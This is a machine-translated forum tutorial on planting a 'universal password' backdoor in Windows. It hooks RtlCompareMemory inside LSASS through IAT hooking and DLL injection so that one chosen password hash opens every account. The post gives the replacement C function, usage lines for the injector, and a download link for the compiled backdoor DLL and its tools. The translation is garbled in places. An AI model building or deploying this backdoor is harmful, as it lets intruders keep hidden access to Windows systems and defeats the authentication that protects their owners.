Use IAT hook to implement windows universal password Backdoor

Source: xuxue University
Author: clyfish

Does windows have a common password?
Ask Uncle Bill.

Whether it is true or not, we can implement such a backdoor by ourselves.

First, we will briefly introduce some Windows login processes.
The Winlogon process uses Gina. DLL to obtain the user name and password, and transmits it to the LSASS process through LPC.
The LSASS process then calls the default authentication package msv00000.dll to verify the correct password.
Msv1_0 obtains the user information from Sam, including the hash of the password.

To implement such a backdoor, you must first find the bottommost layer of the series of functions for login verification, and then perform operations there.
Obviously, this underlying function is in the msv1_0.dll module of the LSASS process.

What LSASS calls msv1_0.dll is this function:
Code:
Msv1_0! Lsaaplogonuserex2
Lsaaplogonuserex2 in msdn
Then we should debug the LSASS process and then go to msv1_0! Lsaaplogonuserex2.
Here, I use windbg and VMWare and dbgsrv for remote user-state debugging.
Http://blogs.msdn.com/spatdsg/archive/2005/12/27/507265.aspx
The above spat blog describes how to use dbgsrv debugging (debugging LSA via dbgsrv.exe ).
Run on a virtual machine (debug end)
Code:
Dbgsrv.exe-t tcp: Port = 1234, password = spat
Then run
Code:

Windbg.exe-premote TCP: Server = 192.168.1.102, Port = 1234, password = spat

Then select to attach the LSASS process.
But here we can't log on and run dbgsrv again, so dbgsrv will be turned off, so I will use the Windows task plan to run dbgsrv on startup.

After the virtual machine is started, dbgsrv is also up, and then connected to the LSASS process with windbg.
At the breakpoint msv1_0! After lsaaplogonuserex2, let LSASS continue to run.
Then, the windbg was disconnected.

At this time, we will introduce a strong windbg command, that is, wt, which records all the function call relationships and keeps records of ret. For detailed usage, see windbg help.
I guess wt is a single-step operation, so it is very slow.
However, wt outputs a lot of text, which is too ugly. So I wrote a Python script to convert the wt output into a treectrl, as shown in the figure below:

You should pay attention to the function that I clicked on: NTDLL! Rtlcomparememory.
After debugging, I found that this function is the "bottom-layer function" I am looking ".
Code:
Size_t
Rtlcomparememory (
In const void * source1,
In const void * source2,
In size_t Length
);
Rtlcomparememory in msdn
I also found the details of the three parameters of this function during password verification,
Source1 is a unicode md4 hash of the User Password retrieved from Sam,
Source2 is a unicode md4 hash of the password entered by the user,
Length is always 16, because the md4 hash is 16 bits.
It is easy to write the following alternative function:
Code:

Int winapi myrtlcomparememory (void * a, void * B, int Len ){
If (LEN = 16 & prtlcomparememory (passwd_hash, B, Len) = 16)
Return 16;
Return prtlcomparememory (a, B, Len );
}

Prtlcomparememory is a global variable, the address of the real rtlcomparememory, and passwd_hash is the hash of the common password.
You can use myrtlcomparemory to hook up rtlcomparemory to implement the predefined functions.
If we want to compare 16-bit memory, and the second segment of memory is the same as our hash, we can directly release it, no matter what the first segment of memory is.
A friend may ask, if you hook all the calls to rtlcomparememory in the msv1_0 module, will the error not occur?
Don't worry, it's so clever. We need to compare 16 bits and the second segment of memory is exactly the same as our hash?

There are many methods to hook this function,
I chose the lazy IAT hook + DLL injection.
So I wrote a small tool to inject dll: dllinject
Code:

C: \ Documents ents and Settings \ Cly \ Desktop \ bin> injectdll.exe
Injectdll v0.1
Inject/uninject a DLL file to a process, by Cly, at 20080522
Usage:
Injectdll.exe (-I |-u) PID filename
-I: inject
-U: uninject once
-U: uninject at all

Passdoor. dll is the DLL to be injected into the LSASS process. This dll implements IAT hook in the dllmain. If it is very earthy, no code will be posted, and a basket will be searched on the Internet.

Then I wrote another tool: pdconfig
In fact, it is to change the hash in passdoor. DLL to avoid re-compiling passdoor. DLL to change the password.

Usage:
Injectdll.exe-I pid_of_lsass full_path_of_passdoor.dll
Uninstall method:
Code:

Injectdll.exe-u pid_of_lsass full_path_of_passdoor.dll

Http://clyfish.googlepages.com/passdoor.rar
Here is the source code of related tools and compiled binary files.
The packages include injectdll.exe, passdoor.dlland pdconfig.exe. All codes are compiled using mingw gcc4.2.1.
Depressed. attachments cannot be uploaded.

You can see the real technology from the blog !!! Strongly executed reprinted... admire ing !!!